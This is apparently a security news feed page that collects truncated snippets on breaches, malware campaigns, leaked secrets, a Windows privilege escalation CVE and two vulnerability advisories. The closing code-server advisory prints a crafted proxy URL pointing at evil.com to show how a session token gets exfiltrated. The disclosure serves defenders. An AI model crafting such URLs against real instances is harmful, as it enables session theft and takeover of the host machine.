#git

A hacker group claiming affiliation with Anonymous says it breached GlobalX Airlines, leaking sensitive flight and passenger data…

### Impact Potentially untrusted data flows into PR creation logic. A malicious actor could construct a branch name that injects arbitrary code. ### Patches This is patched in 1.13.6 ### Workarounds Downgrade to <1.13.2 ### References * [Understanding the Risk of Script Injections](https://docs.github.com/en/actions/security-for-github-actions/security-guides/security-hardening-for-github-actions#understanding-the-risk-of-script-injections)

Check Point’s April 2025 malware report reveals increasingly sophisticated and hidden attacks using familiar malware like FakeUpdates, Remcos,…

With the digital transformation movement sweeping the world and cyber threats evolving simultaneously to pose greater and greater…

Detecting leaked credentials is only half the battle. The real challenge—and often the neglected half of the equation—is what happens after detection. New research from GitGuardian's State of Secrets Sprawl 2025 report reveals a disturbing trend: the vast majority of exposed company secrets discovered in public repositories remain valid for years after detection, creating an expanding attack

As AI-driven fraud becomes increasingly common, more people feel the need to verify every interaction they have online.

Varonis reveals attackers are using SEO poisoning to trick IT admins into downloading malware, alongside a critical root…

Threat actors have been observed leveraging fake artificial intelligence (AI)-powered tools as a lure to entice users into downloading an information stealer malware dubbed Noodlophile. "Instead of relying on traditional phishing or cracked software sites, they build convincing AI-themed platforms – often advertised via legitimate-looking Facebook groups and viral social media campaigns,"

About Elevation of Privilege – Windows Common Log File System Driver (CVE-2025-29824) vulnerability. The vulnerability from the April Microsoft Patch Tuesday allows an attacker operating under a regular user account to escalate their privileges to SYSTEM level.🔻 According to Microsoft, the vulnerability was exploited in attacks against organizations in the U.S., Venezuela, Spain, and Saudi […]

### Summary A maliciously crafted URL using the `proxy` subpath can result in the attacker gaining access to the session token. ### Details Failure to properly validate the port for a `proxy` request can result in proxying to an arbitrary domain. The malicious URL `https://<code-server>/proxy/test@evil.com/path` would be proxied to `test@evil.com/path` where the attacker could exfiltrate a user's session token. ### Impact Any user who runs code-server with the built-in proxy enabled and clicks on maliciously crafted links that go to their code-server instances with reference to `/proxy`. Normally this is used to proxy local ports, however the URL can reference the attacker's domain instead, and the connection is then proxied to that domain, which will include sending cookies. With access to the session cookie, the attacker can then log into code-server and have full access to the machine hosting code-server as the user running code-server. ### Patches Patched versions are from...